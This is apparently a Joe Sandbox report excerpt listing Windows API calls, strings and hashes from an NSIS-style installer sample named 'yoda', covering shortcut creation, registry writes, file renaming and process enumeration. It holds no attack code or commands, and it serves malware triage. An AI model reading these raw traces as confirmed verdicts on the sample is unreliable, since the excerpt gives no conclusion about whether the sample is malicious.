                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                • String ID: F$N$open
                                                                                                                                                                                                                                                                • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
